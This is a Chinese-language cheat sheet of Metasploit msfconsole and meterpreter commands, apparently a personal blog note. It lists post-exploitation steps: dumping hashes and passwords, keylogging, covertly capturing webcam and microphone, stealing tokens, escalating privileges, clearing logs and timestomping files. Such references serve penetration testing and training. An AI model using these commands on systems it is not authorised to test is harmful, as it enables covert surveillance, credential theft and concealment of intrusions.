metasploit 命令备忘录
稍微记一下免得以后查的麻烦
metasploit 命令
msfconsole
查看帮助
help
搜索模块
search
使用模块
use
切换目录
cd
切换颜色
color
加载框架插件
load
卸载加载的插件
unload
将路径加载到 metasploit 以使用第三方模块
loadpath
重复命令
repeat
加载运行 metasploit 可运行的脚本
resource
显示版本
version
添加路由等等
route
返回
back
检验是否存在漏洞而不是利用
check
连接类似 nc 提供连接目标
connect
编辑当前使用的模块代码
edit
显示模块全部信息
info
进入 Ruby shell
irb
列出后台任务
jobs
结束任务
kill
显示命令
show
查看参数
show options
查看攻击载荷
show payloads
查看辅助模块
show auxiliary
显示支持的操作系统
show targets
设置编码器
show encoders
显示高级选项
show advanced
show ...
设置参数
set
设置回连 ip
set LHOST
设置目标 ip
set RHOST
设置 payloads
set payloads
set ...
清除全部设置(set)
unset all
执行攻击
exploit
运行模块
run
监听模块
use exploit/multi/handler
列出所有会话
session -l
选择一个会话
session -i id
meterpreter
帮助
help
将会话放到后台
background
输入文件内容(目标机上的文件)
cat
切换目录(目标机上)
cd
查看当前路径(目标机上)
pwd
清除日志
clearev
下载目标机上的文件
download
编辑文件(目标机上)
edit
执行程序
execute
-H 不显示界面
-a 传递的命令参数
-c 开启通道化
-f 要运行的程序
-i 创建后交互式
-k
-m 直接在内存中运行
-d 使用-m 时指定进程的名字
-s 在指定会话中运行
-t 使用当前模拟的线程令牌执行进程
获取当前运行在什么用户内
getuid
转储 hash
hashdump
查看目标主机已经空闲了多长时间
idletime
显示网络信息(目标机)
ipconfig
迁移命令
migrate
列出正在运行的程序
ps
执行一个 meterpreter 可以运行脚本
resource
搜索文件
search
不多说
shell
上传文件请用双斜杠
upload
显示目标主机上当前可用相机
webcam_list
使用相机拍一个照片保存到本地
webcam_snap
自动获取 system 权限
getsystem
添加一个隧道
portfwd
显示系统信息
sysinfo
使用一个脚本
use
加载一个脚本
load
运行一个模块或脚本
run
重启
reboot
截屏
screenshot
结束一个进程
kill
限制目标操作
uictl
enable 禁用
disable 启用
keyboard 键盘
mouse 鼠标
录制声音默认 1 秒
record_mic
-d 秒数(默认 1 秒)
-f 文件位置
列出所有挂载点/逻辑驱动器
show_mount
显示 arp 缓存
arp
获取当前目标机器代理配置
getproxy
显示网络连接
netstat
释放任何活动的模拟令牌
drop_token
获取环境变量
getenv
获取用户 SID
getsid
获取正在运行的用户
getuid
使用名字终结进程
pkill
交互式修改注册表
reg
-d 注册表中值的数据
-k 注册表键路径
-v 注册表键名称
enumkey 枚举可获得的键
setval 设置键值
queryval 查询键值数据
键盘记录开始
keyscan_start
停止
keyscan_stop
播放指定的网络摄像头视频流
webcam_stream
播放音频文件在目标机上
play
显示时间
localtime
获取密码
wdigest
查看或修改路由表
route
操作文件 MACE
timestomp
查看当前用户拥有的权限
getprivs
查看 meterpreter 在什么进程里
getpid
查看可用桌面
enumdesktops
获取当前与 meterpreter 相关联的桌面
getdesktop
设置 meterpreter 关联的桌面
set_desktop
窃取令牌
steal_token
一些常用脚本或模块
模拟 tokens
run incognito
list_tokens -g 列出所有 tokens
list_tokens -u 列出目前拥有的 tokens
impersonate_token "" 用来模拟 token
循环抓取摄像头
run webcam
-s 停止
添加路由
run autoroute
vnc 远程桌面
run vnc
远程 rdp 相关
run getgui
-e 开启远程桌面
-u -p 添加用户和密码
-f 6666 -e 转发 3389 到别的端口
run post/windows/manage/enable_rdp 开启远程桌面
run post/windows/gather/checkvm 是否虚拟机
run post/linux/gather/checkvm 是否虚拟机
run post/windows/gather/forensics/enum_drives 查看分区
run post/windows/gather/enum_applications 获取安装软件信息
run post/windows/gather/dumplinks 获取最近的文件操作
run post/windows/gather/enum_ie 获取 IE 缓存
run post/windows/gather/enum_chrome 获取 Chrome 缓存
run post/windows/gather/enum_domain 查找域控
run post/windows/gather/enum_patches 对比补丁信息
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论